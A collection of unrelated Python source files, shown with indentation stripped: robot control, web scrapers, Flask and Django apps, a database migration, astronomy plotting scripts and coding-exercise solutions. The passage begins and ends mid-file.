bProgram = colourProgram[2]
rColourSensor = rgb[0]
gColourSensor = rgb[1]
bColourSensor = rgb[2]
# compare the sets of values
# if the values match, run the corresponding program
if abs(rColourSensor - rProgram) < 12 and abs(gColourSensor - gProgram) < 12 and abs(bColourSensor - bProgram) < 12:
mediumMotor.reset()
# read the relevant program XML
fileName = program.get('fileName')
print(fileName,file=stderr)
dataXML = ET.parse(fileName)
steps = dataXML.getroot()
# run each step individually unless they are run in parallel
for step in steps:
action = step.get('action')
# loop through actions that should be run in parallel
if action == 'launchInParallel':
for subSteps in step:
thread = launchStep(lambda:stopProcessing, subSteps)
threadPool.append(thread)
# run each action that isn't run in parallel individually
else:
thread = launchStep(lambda:stopProcessing, step)
threadPool.append(thread)
while not stopProcessing:
# if there are no threads running start the next action
if not threadPool:
break
# remove any completed threads from the pool
for thread in list(threadPool): # iterate over a copy so removal is safe
if not thread.is_alive():
threadPool.remove(thread)
# if the robot has been lifted or the key removed then stop everything
if isKeyTaken(rProgram, gProgram, bProgram):
stopProcessing = True
break
# if the 'stopProcessing' flag has been set then finish the whole loop
if stopProcessing:
off()
break
main()
|
__author__ = 'avasilyev2'
from selenium.webdriver.common.by import By
import selenium
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.keys import Keys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.action_chains import ActionChains
import db_work
class BasePage(object):
def __init__(self, driver):
self.driver = driver
self.wait = WebDriverWait(self.driver, 10)
class CatalogPage(BasePage):
def hover(self, element):
element_to_show_tooltip = element.find_element_by_class_name("img")
hov = ActionChains(self.driver).move_to_element(element_to_show_tooltip)
hov.perform()
text = self.driver.find_element_by_xpath('//*[@id="tooltip"]/h3').get_attribute('textContent')
return text
def check_if_available(self, prod):
try:
prod.find_element_by_xpath('/html/body/div[4]/div[1]/div[3]/div/div[2]/li[1]/div[10]')
except NoSuchElementException:
return False
return True
def get_products(self):
products = []
prods = self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'product-item')))
for prod in prods:
product = {"name": CatalogPage.hover(self, prod),
"image": prod.find_element_by_xpath(".//img").get_attribute("src"),
"price": int(CatalogPage.only_numerics(self, prod.find_element_by_class_name("price").text)),
"availability": CatalogPage.check_if_available(self, prod),
"link": prod.find_element_by_xpath(".//a").get_attribute("href"),
"shop": "hobbyworld"}
db_work.save_to_db(product)
products.append(product)
return products
def next_page(self):
next_page = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'next-page')))
next_page.click()
time.sleep(3)
def check_next_page_exists(self):
try:
self.driver.find_element_by_class_name('next-page')
except NoSuchElementException:
return False
return True
def only_numerics(self, seq):
return ''.join(filter(type(seq).isdigit, seq)) # join so int() can consume the result on Python 3
def get_top_games(self):
products = []
root = self.wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div[4]/div[1]/div[4]/div/div[1]/ul')))
prods = root.find_elements_by_xpath(".//li")
count = 0
for prod in prods:
if count == 4:
prod.find_element_by_xpath('/html/body/div[4]/div[1]/div[4]/div/div[3]').click()
time.sleep(1)
count = 0
product = {"name": CatalogPage.hover(self, prod),
"image": prod.find_element_by_xpath(".//img").get_attribute("src"),
"price": int(CatalogPage.only_numerics(self, prod.find_element_by_class_name("price").text)),
"link": prod.find_element_by_xpath(".//a").get_attribute("href"),
"shop": "hobbyworld"}
db_work.save_top(product)
products.append(product)
count += 1
return products
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
class queueUsingTwoStack:
def __init__(self):
#stack1 is for enqueue and stack2 is for dequeue
self.stack1=[]
self.stack2=[]
def enqueue(self,item):
self.stack1.append(item)
#print(self.stack1)
def dequeue(self):
if not self.stack2:
while self.stack1:
self.stack2.append(self.stack1.pop())
self.stack2.pop()
def peek(self):
if self.stack2!=[]:
#we have to see the element not pop now
print(self.stack2[-1])
else:
#we have to see the element not pop now
print(self.stack1[0])
queue=queueUsingTwoStack()
for _ in range(int(input())):
val = list(map(int,input().split()))
if val[0] == 1:
queue.enqueue(val[1])
elif val[0] == 2:
queue.dequeue()
else:
queue.peek()
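# The two stacks give amortized O(1) queue operations: each element is pushed
# and popped at most twice in total. A hypothetical stdin session for the
# driver above (1 = enqueue, 2 = dequeue, 3 = peek):
#   3
#   1 42
#   3      <- prints 42
#   2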
|
from django import forms
from .models import GENDER_CHOICES
GENDER_CHOICES = GENDER_CHOICES + [('', '---------')]
class ProfileSearchForm(forms.Form):
gender = forms.ChoiceField(label='Sex', choices=GENDER_CHOICES, required=False)
yearly_income = forms.IntegerField(label='Salary (above)', required=False)
height = forms.FloatField(label='Height (above)', required=False)
weight = forms.FloatField(label='Weight (below)', required=False)
ProfileSearchFormSet = forms.formset_factory(ProfileSearchForm, extra=3)
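# A hedged sketch of consuming the formset in a view; the Profile model and
# its field names are assumptions, not taken from models.py.
# def profile_search(request):
#     formset = ProfileSearchFormSet(request.GET or None)
#     profiles = Profile.objects.all()
#     if formset.is_valid():
#         for form in formset:
#             gender = form.cleaned_data.get('gender')
#             if gender:
#                 profiles = profiles.filter(gender=gender)
#     return render(request, 'search.html', {'formset': formset, 'profiles': profiles})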
|
import time
import pygame
import config
import pprint
from src import backlight
from src import metoffer
from src import weather
from src import clock
from src import display
from threading import Timer,Thread,Event
weather = weather.Data( metoffer.MetOffer(config.metoffice_key) )
clock = clock.DateTime()
display = display.Display()
backlight = backlight.Backlight(config.backlight_delay)
class Tocker(Thread):
def __init__(self, event,clock):
Thread.__init__(self)
self.stopped = event
self.clock = clock
def run(self):
while not self.stopped.wait(0.5):
if(backlight.state == 'off'):
continue
display.tick()
if(clock.isNewMinute()):
display.updateMinute(clock.minute())
if(clock.isNewHour()):
display.updateHour(clock.hour())
display.updateDate(clock.day(),clock.fullDate())
try:
display.updateWeatherSummary(weather.daySummary())
display.updateWeatherForecast(weather.forecast(),clock.theTime())
display.displayActions()
except Exception:
print('something up with metoffice')
display.update()
stopFlag = Event()
thread = Tocker(stopFlag,clock)
thread.start()
while True :
for event in pygame.event.get() :
# Quit
if event.type == pygame.QUIT :
quit()
if(event.type == pygame.MOUSEBUTTONDOWN and config.backlight_control):
state = backlight.toggle()
if(state == 'off'):
clock.reset()
|
"""proposal_contribution: add private, remove no_refund
Revision ID: 4505f00c4ebd
Revises: 0f08974b4118
Create Date: 2019-06-07 10:31:47.120185
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4505f00c4ebd'
down_revision = '0f08974b4118'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('proposal_contribution', sa.Column('private', sa.Boolean(), server_default='true', nullable=False))
op.drop_column('proposal_contribution', 'no_refund')
# ### end Alembic commands ###
# existing contributions with user ids are public
op.execute("UPDATE proposal_contribution SET private = FALSE WHERE user_id IS NOT NULL")
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('proposal_contribution', sa.Column('no_refund', sa.BOOLEAN(), autoincrement=False, nullable=False))
op.drop_column('proposal_contribution', 'private')
# ### end Alembic commands ###
|
import cv2 as cv
import matplotlib.pyplot as plt
def read_image(img):
"""
Function responsible for reading an image
:param img: Path to image
:return: Image read from the path
"""
return cv.imread(img)
def show_images(images: list, columns: int, rows: int):
"""
Function responsible for showing images
:param images: List of images to display
:param columns: How many columns in the subplot
:param rows: How many rows in the subplot
:return: Subplot with images
"""
fig = plt.figure(figsize=(4 * columns, 4 * rows))
for i in range(1, len(images) + 1):
fig.add_subplot(rows, columns, i)
plt.imshow(images[i - 1])
plt.show()
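# A minimal usage sketch (file names are hypothetical). Note cv.imread returns
# BGR, so real code would usually cv.cvtColor(img, cv.COLOR_BGR2RGB) first.
# imgs = [read_image('a.png'), read_image('b.png')]
# show_images(imgs, columns=2, rows=1)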
|
import pickle
from flask import Flask, render_template, request
app = Flask(__name__)
# load the model from disk
filename = 'marriage_age_predict_model.pkl'
model = pickle.load(open(filename, 'rb'))
@app.route('/', methods=['GET'])
def Home():
return render_template('index.html')
@app.route("/predict", methods=['POST'])
def predict():
gender = int(request.args['gender'])
religion = int(request.args['religion'])
caste = int(request.args['caste'])
mother_tongue = int(request.args['mother_tongue'])
country = int(request.args['country'])
height_cms = int(request.args['height_cms'])
predicted_age = model.predict([[gender, religion, caste, mother_tongue, country, height_cms]]) # sklearn expects a 2D array (one row per sample)
print("checking ", str(round(predicted_age[0], 2)))
return str(round(predicted_age[0], 2))
if __name__ == "__main__":
app.run(port=2000, debug=True)
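# A hedged client sketch: the handler reads query-string args (request.args)
# even though the route is POST, so a matching call would be e.g.:
# import requests
# r = requests.post('http://localhost:2000/predict',
#                   params={'gender': 1, 'religion': 2, 'caste': 3,
#                           'mother_tongue': 1, 'country': 5, 'height_cms': 170})
# print(r.text)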
|
import pandas
import densityx
import Tkinter
import tkFileDialog
import sys
import os
def open_file_handler():
Tkinter.Tk().withdraw() # Close the root window
filePath = tkFileDialog.askopenfilename()
print filePath
return filePath
if __name__ == "__open_file_handler__":
open_file_handler()
def handle_file():
filePath = open_file_handler()
# handle the file
myfile = open_file_handler()
user_input_data = pandas.read_excel(myfile) #import excel file chosen by user
#use library to calculate density
densities = densityx.Density(user_input_data)
#Remane some columns for explicit output to excel spreadsheet
densities = densities.rename(columns = {'density':'Density(g/cm3)', 'density_unc':'Uncertainty(g/cm3)'})
#get 100% normalized composition, which is what is used for density calcs
normalized = densityx.NormalizeWtPercentVals(user_input_data)
#Make a sheet with only the important output data
output = densities[["Sample_ID", "Density(g/cm3)", "Uncertainty(g/cm3)"]] #keep only the renamed output columns
#Save this new data to an Excel spreadsheet
filename, file_extension = os.path.splitext(myfile)
writer = pandas.ExcelWriter(filename + '_output' + file_extension, engine='xlsxwriter') #Create a Pandas Excel writer using XlsxWriter as the engine.
output.to_excel(writer, sheet_name='Density Data')
normalized.to_excel(writer, sheet_name='Normalized Data')
writer.save() #Close the Pandas Excel writer and output the Excel file
print "Success!"
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################
# #
# acis_gain_plot_trend.py: plotting gain and offset trends #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last update: Sep 23, 2021 #
# #
#########################################################################
import os
import sys
import re
import string
import math
import operator
import numpy
import time
import Chandra.Time
import scipy
from scipy.optimize import curve_fit
import matplotlib as mpl
if __name__ == '__main__':
mpl.use('Agg')
from pylab import *
import matplotlib.pyplot as plt
import matplotlib.font_manager as font_manager
import matplotlib.lines as lines
#
#--- reading directory list
#
path = '/data/mta/Script/ACIS/Gain/house_keeping/dir_list_py'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- converTimeFormat contains MTA time conversion routines
#
import mta_common_functions as mcf
#
#--- temp writing file name
#
import random
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#
#--- set line color list
#
colorList = ('blue', 'green', 'red', 'aqua', 'lime', 'fuchsia', 'maroon', 'black', 'yellow', 'olive')
#-----------------------------------------------------------------------------------
#--- acis_gain_plot_trend: plotting trends of gain and offset --
#-----------------------------------------------------------------------------------
def acis_gain_plot_trend():
"""
plotting trends of gain and offset
Input: none, but read from <data_dir>
Output: <web_dir>/Plots/gain_plot_ccd<ccd>.png
<web_dir>/Plots/offset_plot_ccd<ccd>.png
"""
for ccd in range(0, 10):
#
#--- plotting 4 nodes on one panel, but gain and offset separately
#
Xset_gain = []
Yset_gain = []
Eset_gain = []
yMin_gain = []
yMax_gain = []
Label_gain = []
Xset_offset = []
Yset_offset = []
Eset_offset = []
yMin_offset = []
yMax_offset = []
Label_offset= []
for node in range(0, 4):
#
#--- read data for given CCD and Node #
#
ifile = data_dir + 'ccd' + str(ccd) + '_' + str(node)
data = mcf.read_data_file(ifile)
time = []
gain = []
gerr = [] #--- error for gain
offset = []
oerr = [] #--- error for offset
#
#--- setting lower and upper limits to remove outliers
#
sum1 = 0.0
sum2 = 0.0
for ent in data:
atemp = re.split('\s+', ent)
gval = float(atemp[4])
sum1 += gval
sum2 += gval * gval
avg = sum1 / len(data)
sig = math.sqrt(sum2/len(data) - avg * avg)
blim = avg - 3.0 * sig
tlim = avg + 3.0 * sig
for ent in data:
atemp = re.split('\s+', ent)
#
#--- convert time into year date (e.g.2012.14)
#
gval = float(atemp[4])
if (gval <= blim) or (gval >= tlim):
continue
ytime = mcf.chandratime_to_fraq_year(float(atemp[0]))
time.append(ytime)
gain.append(float(atemp[4]))
gerr.append(float(atemp[5]))
offset.append(float(atemp[6]))
oerr.append(float(atemp[7]))
xmax = max(time)
Xset_gain.append(time)
Yset_gain.append(gain)
Eset_gain.append(gerr)
#
#--- set plotting range
#
avg = mean(gain)
ymin = avg - 0.005
ymin = round(ymin, 3) -0.001
ymax = avg + 0.005
ymax = round(ymax, 3) +0.001
yMin_gain.append(ymin)
yMax_gain.append(ymax)
name = 'Gain (ADU/eV) Node' + str(node)
Label_gain.append(name)
Xset_offset.append(time)
Yset_offset.append(offset)
Eset_offset.append(oerr)
avg = mean(offset)
ymin = avg - 30.0
ymin = int(ymin)
ymax = avg + 30.0
ymax = int(ymax)
yMin_offset.append(ymin)
yMax_offset.append(ymax)
name = 'Offset (ADU) Node' + str(node)
Label_offset.append(name)
xmin = int(2000)
xtmp = xmax
xmax = int(xmax) + 1
#
#--- if the year is already passed a mid point, add another year
#
if (xtmp - int(xtmp)) > 0.5:
xmax += 1
xname = 'Time (year)'
#
#--- actual plotting starts here
#
yname = 'Gain'
outname = web_dir + "/Plots/gain_plot_ccd" + str(ccd) + '.png'
plotPanel(xmin, xmax, yMin_gain, yMax_gain, Xset_gain, Yset_gain, \
Eset_gain, xname, yname, Label_gain, outname)
yname = 'Offset'
outname = web_dir + "/Plots/offset_plot_ccd" + str(ccd) + '.png'
plotPanel(xmin, xmax, yMin_offset, yMax_offset, Xset_offset, Yset_offset,\
Eset_offset, xname, yname, Label_offset, outname)
#-----------------------------------------------------------------------------------
#--- plotPanel: plots multiple data in separate panels ---
#-----------------------------------------------------------------------------------
def plotPanel(xmin, xmax, yMinSets, yMaxSets, xSets, ySets, eSets, xname, yname, entLabels, outname):
"""
This function plots multiple data in separate panels
Input: xmin --- x min
xmax --- x max
ymin --- y min
ymax --- y max
xSets --- a list of lists containing x-axis data
ySets --- a list of lists containing y-axis data
yMinSets --- a list of ymin
yMaxSets --- a list of ymax
xname --- x label
yname --- y label
entLabels --- a list of the names of each data
outname --- the output file name
Output: outname --- a png plot
"""
#
#--- clean up the plotting device
#
plt.close('all')
#
#---- set a few parameters
#
mpl.rcParams['font.size'] = 9
props = font_manager.FontProperties(size=9)
plt.subplots_adjust(hspace=0.08)
tot = len(entLabels)
#
#--- start plotting each data
#
for i in range(0, len(entLabels)):
axNam = 'ax' + str(i)
#
#--- setting the panel position
#
j = i + 1
if i == 0:
line = str(tot) + '1' + str(j)
else:
line = str(tot) + '1' + str(j) + ', sharex=ax0'
exec("%s = plt.subplot(%s)" % (axNam, line))
exec("%s.set_autoscale_on(False)" % (axNam)) #---- these three may not be needed for the new pylab, but
exec("%s.set_xbound(xmin,xmax)" % (axNam)) #---- they are necessary for the older version to set
exec("%s.set_xlim(xmin=xmin, xmax=xmax, auto=False)" % (axNam))
exec("%s.set_ylim(ymin=yMinSets[i], ymax=yMaxSets[i], auto=False)" % (axNam))
xdata = numpy.array(xSets[i])
ydata = numpy.array(ySets[i])
edata = numpy.array(eSets[i])
elen = len(edata)
pdata = numpy.ones(elen)
#
#--- fitting weighted least sq. line
#
popt, pcov = curve_fit(model, xdata, ydata, p0=(0, 1))
[intc, slope] = list(popt)
[ierr, serr] = list(numpy.sqrt(numpy.diag(pcov)))
ystart = intc + slope * xmin
ystop = intc + slope * xmax
lxdata = [xmin, xmax]
lydata = [ystart, ystop]
#
#---- actual data plotting
#
p, = plt.plot(xdata, ydata, color=colorList[i], marker='.', markersize=4.0, lw =0)
p, = plt.plot(lxdata, lydata, color=colorList[i], marker='', markersize=1.0, lw =1)
plt.errorbar(xdata, ydata, yerr=edata, ecolor=colorList[i], markersize=0.0, fmt='ro')
#
#--- add legend
#
if slope < 0.01:
pslope = slope * 1.0e4
pslope = round(pslope, 3)
pserr = serr * 1.0e4
pserr = round(pserr, 3)
eline = '(' + str(pslope) + '+/-' + str(pserr) + ')e-04'
legend_line = entLabels[i] + ' Slope: ' + eline
else:
legend_line = entLabels[i] + ' Slope: ' + str(round(slope, 3)) + '+/-' + str(round(serr, 3))
leg = legend([p], [legend_line], prop=props, loc=2)
leg.get_frame().set_alpha(0.5)
exec("%s.set_ylabel(yname, size=8)" % (axNam))
#
#--- add x ticks label only on the last panel
#
for i in range(0, tot):
ax = 'ax' + str(i)
if i != tot-1:
line = eval("%s.get_xticklabels()" % (ax))
for label in line:
label.set_visible(False)
else:
pass
xlabel(xname)
#
#--- set the size of the plotting area in inch (width: 10.0in, height 2.08in x number of panels)
#
fig = plt.gcf()
height = (2.00 + 0.08) * tot
fig.set_size_inches(10.0, height)
#
#--- save the plot in png format
#
plt.savefig(outname, format='png', dpi=200)
#--------------------------------------------------------------------------------------------------
#-- model: model for least sq. fitting ---
#--------------------------------------------------------------------------------------------------
def model(x, a, b):
"""
model for least sq. fitting
Input: p (a, b) --- intercept and slope of the line
x --- independent variable value
Output: estimated y value
"""
return a + b*x
#--------------------------------------------------------------------------------------------------
#-- residuals: compute residuals ---
#--------------------------------------------------------------------------------------------------
def residuals(p, my_arrays):
"""
compute residuals
my_arrays --- (x, y, err): they are numpy array
p --- (a, b): intercept and slope
Output: numpy array of residuals
"""
x, y, err = my_arrays
a, b = p
return (y - model(x, a, b)) / err
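#--- note: the same weighting can be handed to curve_fit directly via its
#--- sigma argument, e.g. curve_fit(model, xdata, ydata, p0=(0, 1), sigma=edata)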
#--------------------------------------------------------------------
#
#--- pylab plotting routine related modules
#
if __name__ == '__main__':
acis_gain_plot_trend()
|
#!/usr/bin/env python2
import requests
import re
import json
class FailedRequest(Exception): pass
def get_results(user):
r = requests.get('https://www.root-me.org/%s' % user, params={'inc': 'score', 'lang': 'fr'})
if r.status_code != 200: raise FailedRequest(r)
return r.content
def get_status(user):
content = get_results(user)
m = re.search(r'(\d+) Points ', content)
assert(m)
score = int(m.group(1))
problems = []
for m in re.findall(r'\<a class=" (vert|rouge)".*?(x|o) (.*?)<', content):
(color, status, problem) = m
STATUSES = {
'x': False,
'o': True,
}
assert(status in STATUSES)
problems.append((problem, STATUSES[status]))
return (score, problems)
if __name__ == '__main__':
from argparse import ArgumentParser
import sys
users_cfg = None
parser = ArgumentParser('Fetch root-me.org results for the given set of pseudos.')
parser.add_argument('--users', help='JSON file where to read pseudos', required=True)
parser.add_argument('--result', help='JSON file where to write results', default='-')
options = parser.parse_args()
assert('users' in options and 'result' in options)
with open(options.users, 'rb') as f:
pseudos = json.load(f)
users = {}
for pseudo in pseudos:
try:
(score, problems) = get_status(pseudo)
users[pseudo] = {'score': score, 'problems': problems}
except:
users[pseudo] = {'score': 0, 'problems': []}
if options.result == '-':
f = sys.stdout
else:
f = open(options.result, 'wb')
json.dump(users, f)
|
import polars as pl
def test_date_datetime() -> None:
df = pl.DataFrame(
{
"year": [2001, 2002, 2003],
"month": [1, 2, 3],
"day": [1, 2, 3],
"hour": [23, 12, 8],
}
)
out = df.select(
[
pl.all(), # type: ignore
pl.datetime("year", "month", "day", "hour").dt.hour().alias("h2"), # type: ignore
pl.date("year", "month", "day").dt.day().alias("date"), # type: ignore
]
)
assert out["date"].series_equal(df["day"])
assert out["h2"].series_equal(df["hour"])
|
"""
refer to src/1282.cpp
"""
from typing import List
class Solution:
# Runtime: 72 ms, faster than 95.14%
# Memory Usage: 12.8 MB, less than 100.00%
def groupThePeople(self, groupSizes: List[int]) -> List[List[int]]:
d = {}
for idx, v in enumerate(groupSizes):
if v not in d:
d[v] = [idx]
else:
d[v].append(idx)
ret = []
for k, vals in d.items():
for i in range(len(vals) // k):
ret.append(vals[i * k : (i + 1) * k])
return ret
# Runtime: 228 ms, faster than 5.69%
# Memory Usage: 12.8 MB, less than 100.00%
def groupThePeople_1(self, groupSizes: List[int]) -> List[List[int]]:
n = len(groupSizes)
ret = [] # to record all groups
ret_limit = [] # to record limitation of groups
succ = False # to mark if successful in inserting
for i in range(n):
s = groupSizes[i]
length = len(ret)
succ = False
# insert current person into existing group
for j in range(length):
limit = ret_limit[j]
# valid group
if s == limit and limit > len(ret[j]):
ret[j].append(i)
succ = True
break
# create a new group
if not succ:
ret_limit.append(s)
ret.append([i])
return ret
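# A worked example for either method: groupSizes = [3, 3, 3, 3, 3, 1, 3]
# yields [[0, 1, 2], [3, 4, 6], [5]] (any grouping of the right sizes is valid).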
|
import os
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
from models import db, User, Planets, Characters, Vehicles, Favorite
from flask_migrate import Migrate
#from flask_script import Manager
BASEDIR = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///" + os.path.join(BASEDIR, "test.db")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['ENV'] = 'development'
app.config['DEBUG'] = True
#manager = Manager(app)
Migrate(app, db)
db.init_app(app)
@app.route('/')
def home():
return jsonify('Creando Star Wars API')
@app.route("/user", methods=["POST", "GET"])
def user():
if request.method == "GET":
user = User.query.all()
user = list(map(lambda user: user.serialize(), user))
if user is not None:
return jsonify(user)
else:
user = User()
user.user_name = request.json.get("user_name")
user.first_name = request.json.get("first_name")
user.last_name = request.json.get("last_name")
user.password = request.json.get("password")
user.email = request.json.get("email")
db.session.add(user)
db.session.commit()
return jsonify(user.serialize()), 200
@app.route("/favorite/user/<int:user_id>", methods=["GET","POST"])
def userFav(user_id):
if request.method == "GET":
if user_id is not None:
favorites = Favorite.query.filter_by(user_id=user_id)
favorites = list(map(lambda favorite: favorite.serialize(), favorites))
return jsonify(favorites), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_planet_id = request.json.get("fav_planet_id")
favorite.fav_character_id = request.json.get("fav_character_id")
favorite.fav_vehicle_id = request.json.get("fav_vehicle_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/user/favorite", methods=["POST", "GET"])
def favorite():
if request.method == "GET":
favorite = Favorite.query.get(3)
if favorite is not None:
return jsonify(favorite.serialize())
else:
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_planet_id = request.json.get("fav_planet_id")
favorite.fav_character_id = request.json.get("fav_character_id")
favorite.fav_vehicle_id = request.json.get("fav_vehicle_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/planets/<int:planet_id>", methods=["POST"])
def addplanetid(planet_id):
if request.method == "POST":
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_planet_id = request.json.get("planet_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/characters/<int:character_id>", methods=["POST"])
def addcharacterid(character_id):
if request.method == "POST":
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_character_id = request.json.get("character_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/vehicles/<int:vehicle_id>", methods=["POST"])
def addvehicleid(vehicle_id):
if request.method == "POST":
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_vehicle_id = request.json.get("vehicle_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/vehicles/<int:vehicle_id>", methods=["DELETE"])
def deletevehicleid(vehicle_id):
if request.method == "DELETE":
favorite = Favorite.query.filter_by(fav_vehicle_id=vehicle_id).first()
db.session.delete(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/characters/<int:character_id>", methods=["DELETE"])
def deletecharacters(character_id):
if request.method == "DELETE":
favorite = Favorite.query.filter_by(user_id=request.json.get("user_id"), fav_character_id=character_id).first()
db.session.delete(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/planets/<int:planet_id>", methods=["DELETE"])
def deleteplanets(planet_id):
if request.method == "DELETE":
favorite = Favorite.query.filter_by(fav_planet_id=planet_id).first()
db.session.delete(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/planets", methods=["POST", "GET"])
def planets():
if request.method == "GET":
planets = Planets.query.all()
planets = list(map(lambda planets: planets.serialize(), planets))
if planets is not None:
return jsonify(planets)
else:
planets = Planets()
planets.name = request.json.get("name")
planets.climate = request.json.get("climate")
planets.terrain = request.json.get("terrain")
planets.population = request.json.get("population")
planets.diameter = request.json.get("diameter")
planets.rotation_period = request.json.get("rotation_period")
planets.orbital_period = request.json.get("orbital_period")
planets.surface_water = request.json.get("surface_water")
planets.residents = request.json.get("residents")
db.session.add(planets)
db.session.commit()
return jsonify(planets.serialize()), 200
@app.route("/addplanets", methods=["POST"])
def addplanets():
planets_list = request.json.get("planets_list")
for planets in planets_list:
new_planets = Planets()
new_planets.name= planets["name"]
new_planets.climate = planets["climate"]
new_planets.terrain = planets["terrain"]
new_planets.population = planets["population"]
new_planets.diameter = planets["diameter"]
new_planets.rotation_period = planets["rotation_period"]
new_planets.orbital_period = planets["orbital_period"]
new_planets.surface_water = planets["surface_water"]
new_planets.residents = planets["residents"]
db.session.add(new_planets)
db.session.commit()
return jsonify("Done"), 200
@app.route("/planets/<int:planet_id>", methods=["GET","POST"])
def planet(planet_id):
if request.method == "GET":
if planet_id is not None:
planets = Planets.query.get(planet_id)
return jsonify(planets.serialize()), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
planets = Planets()
planets.name = request.json.get("name")
planets.climate = request.json.get("climate")
planets.terrain = request.json.get("terrain")
planets.population = request.json.get("population")
planets.diameter = request.json.get("diameter")
planets.rotation_period = request.json.get("rotation_period")
planets.orbital_period = request.json.get("orbital_period")
planets.surface_water = request.json.get("surface_water")
planets.residents = request.json.get("residents")
db.session.add(planets)
db.session.commit()
return jsonify(planets.serialize()), 200
@app.route("/characters", methods=["POST", "GET"])
def characters():
if request.method == "GET":
characters = Characters.query.all()
characters = list(map(lambda characters: characters.serialize(), characters))
if characters is not None:
return jsonify(characters)
else:
characters = Characters()
characters.name = request.json.get("name")
characters.height = request.json.get("height")
characters.mass = request.json.get("mass")
characters.hair_color = request.json.get("hair_color")
characters.skin_color = request.json.get("skin_color")
characters.eye_color = request.json.get("eye_color")
characters.birth_year = request.json.get("birth_year")
characters.gender = request.json.get("gender")
characters.homeworld = request.json.get("homeworld")
#characters.vehicles = request.json.get("vehicles")
db.session.add(characters)
db.session.commit()
return jsonify(characters.serialize()), 200
@app.route("/characters/<int:character_id>", methods=["GET","POST"])
def character(character_id):
if request.method == "GET":
if character_id is not None:
characters = Characters.query.get(character_id)
return jsonify(characters.serialize()), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
characters = Characters()
characters.name = request.json.get("name")
characters.height = request.json.get("height")
characters.mass = request.json.get("mass")
characters.hair_color = request.json.get("hair_color")
characters.skin_color = request.json.get("skin_color")
characters.eye_color = request.json.get("eye_color")
characters.birth_year = request.json.get("birth_year")
characters.gender = request.json.get("gender")
characters.homeworld = request.json.get("homeworld")
#characters.vehicles = request.json.get("vehicles")
db.session.add(characters)
db.session.commit()
return jsonify(characters.serialize()), 200
@app.route("/vehicles", methods=["POST", "GET"])
def vehicles():
if request.method == "GET":
vehicles = Vehicles.query.all()
vehicles = list(map(lambda vehicles: vehicles.serialize(), vehicles))
if vehicles is not None:
return jsonify(vehicles)
else:
vehicles = Vehicles()
vehicles.name = request.json.get("name")
vehicles.model = request.json.get("model")
vehicles.manufacturer = request.json.get("manufacturer")
vehicles.cost_in_credits = request.json.get("cost_in_credits")
vehicles.crew = request.json.get("crew")
vehicles.passengers = request.json.get("passengers")
vehicles.cargo_capacity = request.json.get("cargo_capacity")
vehicles.vehicle_class = request.json.get("vehicle_class")
vehicles.pilots = request.json.get("pilots")
db.session.add(vehicles)
db.session.commit()
return jsonify(vehicles.serialize()), 200
@app.route("/addvehicles", methods=["POST"])
def addvehicles():
vehicles_list = request.json.get("vehicles_list")
for vehicles in vehicles_list:
new_vehicles = Vehicles()
new_vehicles.name= vehicles["name"]
new_vehicles.model = vehicles["model"]
new_vehicles.manufacturer = vehicles["manufacturer"]
new_vehicles.cost_in_credits = vehicles["cost_in_credits"]
new_vehicles.crew = vehicles["crew"]
new_vehicles.passengers = vehicles["passengers"]
new_vehicles.cargo_capacity = vehicles["cargo_capacity"]
new_vehicles.vehicle_class = vehicles["vehicle_class"]
#new_vehicles.pilots = vehicles["pilots"]
db.session.add(new_vehicles)
db.session.commit()
return jsonify("Done"), 200
@app.route("/vehicles/<int:vehicle_id>", methods=["GET","POST"])
def vehicle(vehicle_id):
if request.method == "GET":
if vehicle_id is not None:
vehicles = Vehicles.query.get(vehicle_id)
return jsonify(vehicles.serialize()), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
vehicles = Vehicles()
vehicles.name = request.json.get("name")
vehicles.model = request.json.get("model")
vehicles.manufacturer = request.json.get("manufacturer")
vehicles.cost_in_credits = request.json.get("cost_in_credits")
vehicles.crew = request.json.get("crew")
vehicles.passengers = request.json.get("passengers")
vehicles.cargo_capacity = request.json.get("cargo_capacity")
vehicles.vehicle_class = request.json.get("vehicle_class")
